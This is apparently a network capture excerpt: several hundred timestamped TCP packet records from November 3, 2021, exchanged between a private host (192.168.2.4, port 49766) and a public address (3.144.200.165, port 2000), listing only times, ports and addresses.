Nov 3, 2021 14:44:39.309643984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309669971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309679985 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309695005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309720039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309742928 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309745073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309771061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309784889 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309797049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309820890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309844971 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309844971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309871912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309895992 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.353182077 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.360701084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.360737085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.360826969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422221899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422259092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422281027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422305107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422324896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422348022 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422372103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422395945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422418118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422444105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422466993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422489882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422513008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422518969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422537088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422555923 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422559977 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422563076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422569036 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422573090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422584057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422604084 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422607899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422631025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422655106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422658920 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422677040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422702074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422713995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422728062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422734976 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422754049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422775030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422796965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422806025 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422821999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422842026 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422847033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422872066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422897100 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422899008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422923088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422938108 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.422947884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422971964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.422992945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423015118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423023939 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423038006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423041105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423060894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423084021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423104048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423105955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423127890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423151016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423152924 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423166990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423172951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423197985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423218012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423219919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423242092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423264027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423285007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423295975 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423309088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423326969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423332930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423357010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423357964 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423378944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423399925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423403978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423428059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423449993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423463106 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423472881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423496962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423501015 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423518896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423521996 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423542023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423564911 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423579931 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423588991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423618078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423644066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423645020 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423671007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423696041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423701048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423721075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423747063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423752069 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423772097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423794985 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423798084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423821926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423845053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423846006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423871994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423893929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423901081 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423919916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423930883 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423943996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423969984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.423978090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.423995018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424020052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424025059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424043894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424068928 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424088955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424093008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424117088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424120903 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424141884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424166918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424166918 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424191952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424216032 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424240112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424251080 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424262047 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424282074 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424285889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424309969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424318075 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424333096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424355984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424369097 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424381971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424405098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424407005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424431086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424453974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424460888 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424479008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424503088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424526930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424529076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424546957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424567938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424587965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424612999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424619913 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424644947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424644947 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424669027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424694061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424717903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424719095 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424741030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424757957 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424768925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424793005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424799919 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424815893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424840927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424869061 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424884081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424885988 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.424910069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424935102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424957991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424982071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.424983978 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425005913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425008059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425029993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425054073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425054073 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425079107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425103903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425107002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425128937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425152063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425153971 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425173998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425194979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425218105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425235987 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425241947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425265074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425298929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425301075 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425322056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425345898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425354004 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425369024 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425393105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425415039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425421953 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425436020 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425438881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425462008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425482988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425483942 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425502062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425524950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425548077 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425549030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425566912 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425573111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425596952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425621986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425645113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425658941 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425672054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425683975 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425695896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425719976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425738096 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425744057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425766945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425779104 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425791979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425817966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425822973 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425841093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425864935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425890923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425908089 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425915956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425940037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425946951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425962925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.425972939 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.425987005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.426009893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.426034927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.426050901 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.426064014 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.455715895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455749989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455775976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455801010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455825090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455849886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455873013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455894947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455893040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.455920935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455931902 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.455945015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455951929 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.455966949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.455986977 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.456003904 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.456011057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.456038952 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.456058979 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458085060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458121061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458144903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458158970 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458172083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458190918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458199978 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458215952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458220005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458242893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458266973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458270073 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458291054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458292961 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458313942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458333969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458336115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458345890 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458359003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458381891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458383083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458406925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458429098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458434105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458452940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458453894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458477974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458496094 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458503962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458528042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458542109 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458554029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458570957 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458578110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458605051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458609104 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458628893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458646059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458652973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458681107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458682060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458705902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458719015 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458730936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458751917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458753109 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458771944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458786964 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458794117 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458821058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458831072 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458844900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458865881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458869934 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458894968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458915949 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458919048 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458929062 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458940983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.458964109 CET	2000	49766	3.144.200.165	192.168.2.4
